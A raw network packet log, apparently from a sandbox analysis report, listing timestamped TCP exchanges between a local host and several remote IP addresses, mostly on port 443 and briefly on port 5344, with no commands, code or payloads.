                                                                                                  Nov 24, 2021 14:17:06.424577951 CET49830443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:06.424597979 CET44349830142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:06.424623966 CET44349830142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:06.424768925 CET49830443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:06.424809933 CET44349830142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:06.424954891 CET49830443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:06.424987078 CET44349830142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:06.425046921 CET44349830142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:06.425251961 CET49830443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:06.425297022 CET49830443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:06.425317049 CET44349830142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:06.425348043 CET49830443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:13.366280079 CET49831443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:13.366364002 CET44349831142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.366637945 CET49831443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:13.386038065 CET49831443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:13.386050940 CET44349831142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.420851946 CET44349831142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.421055079 CET49831443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:13.423727989 CET44349831142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.423971891 CET49831443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:13.433305979 CET49831443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:13.433959961 CET44349831142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.434086084 CET49831443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:13.436186075 CET49831443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:13.479846954 CET44349831142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.754254103 CET44349831142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.754414082 CET44349831142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.754432917 CET49831443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:13.754591942 CET49831443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:13.756303072 CET49831443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:13.756346941 CET44349831142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.842977047 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:13.842999935 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.843218088 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:13.843521118 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:13.843540907 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.874388933 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.874562025 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:13.875189066 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.875335932 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:13.875341892 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:13.879884005 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:13.880537987 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:13.880795002 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:13.881098032 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:13.923858881 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.076705933 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.076961040 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.077549934 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.077733040 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.078370094 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.078561068 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.079713106 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.079900026 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.079914093 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.080090046 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.080480099 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.080693960 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.080710888 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.080890894 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.087570906 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.087724924 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.087749958 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.087764978 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.087901115 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.087929010 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.088155031 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.088491917 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.088668108 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.088681936 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.088855982 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.089190960 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.089405060 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.089418888 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.089593887 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.089951992 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.090126991 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.090140104 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.090332031 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.090676069 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.090837002 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.090850115 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.091016054 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.091495037 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.091638088 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.091653109 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.091799974 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.092209101 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.092385054 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.092400074 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.092654943 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.092945099 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.093095064 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.093107939 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.093256950 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.093584061 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.093724966 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.093736887 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.093877077 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.094201088 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.094363928 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.094377041 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.094516993 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.094867945 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.094988108 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.095010996 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.095021963 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.095129013 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.095537901 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.095678091 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.095690966 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.095829964 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.096214056 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.096353054 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.096364975 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.096506119 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.096889973 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.097028017 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.097039938 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.097181082 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.097528934 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.097676039 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.097687960 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.097827911 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.098505020 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.098655939 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.098668098 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.098711967 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.098790884 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.098803043 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.098872900 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.098942995 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.099200010 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.099349022 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.099360943 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.099407911 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.099503040 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.099514961 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.099550962 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.099654913 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.100099087 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.100250006 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.100261927 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.100456953 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.100512028 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.100653887 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.100666046 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.100723028 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.100807905 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.100819111 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.100862026 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.100960016 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.101411104 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.101543903 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.101562977 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.101572990 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.101624966 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.101726055 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.101737022 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.101777077 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.101878881 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.102332115 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.102472067 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.102483988 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.102529049 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.102679968 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.102690935 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.102833986 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.103207111 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.103344917 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.103357077 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.103414059 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.103498936 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.103512049 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.103625059 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.103632927 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.104170084 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.104310989 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.104316950 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.104326010 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.104453087 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.104465008 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.104604959 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.105004072 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.105160952 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.105190039 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.105200052 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.105317116 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.105324984 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.105333090 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.105534077 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.105973005 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.106128931 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.106153011 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.106163025 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.106280088 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.106287956 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.106296062 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.106487036 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.106764078 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.106909037 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.106920958 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.106976032 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.107052088 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.107108116 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.107120991 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.107198000 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.107245922 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.107585907 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.107738972 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.107745886 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.107753992 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.107891083 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.107901096 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.107908964 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.108134031 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.108320951 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.108457088 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.108469009 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.108525038 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.108611107 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.108622074 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.108658075 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.108772039 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.109132051 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.109285116 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.109297037 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.109348059 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.109438896 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.109451056 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.109486103 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.109600067 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.110097885 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.110234022 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.110239029 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.110249996 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.110383987 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.110622883 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.110769987 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.110781908 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.110851049 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.110905886 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.110923052 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.110934019 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.111013889 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.111021042 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.111061096 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.111588955 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.111737013 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.111759901 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.111769915 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.111855030 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.111886024 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.111893892 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.111901045 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.111983061 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.111994982 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.112006903 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.112102032 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.112108946 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.112149954 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.112515926 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.112659931 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.112672091 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.112746954 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.112790108 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.112813950 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.112823963 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.112874985 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.112894058 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.112941980 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.112952948 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.112956047 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.112962008 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.113065004 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.113112926 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.113120079 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.113126993 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.113262892 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.113406897 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.113559961 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.113570929 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.113713980 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.113724947 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.113805056 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.113866091 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.113877058 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.113940001 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.113945961 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114037037 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114048004 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.114051104 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114057064 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.114113092 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.114136934 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114183903 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114190102 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114195108 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114202023 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.114233017 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114361048 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114599943 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.114665031 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.114721060 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114793062 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114801884 CET44349832142.250.186.97192.168.11.20
                                                                                                  Nov 24, 2021 14:17:14.114804983 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114840984 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:14.114939928 CET49832443192.168.11.20142.250.186.97
                                                                                                  Nov 24, 2021 14:17:20.280069113 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:17:20.280961990 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:17:20.370788097 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:17:20.874032974 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:20.874133110 CET44349834142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:20.874280930 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:20.909029961 CET49834443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:20.909086943 CET44349834142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:20.942476988 CET44349834142.250.185.78192.168.11.20
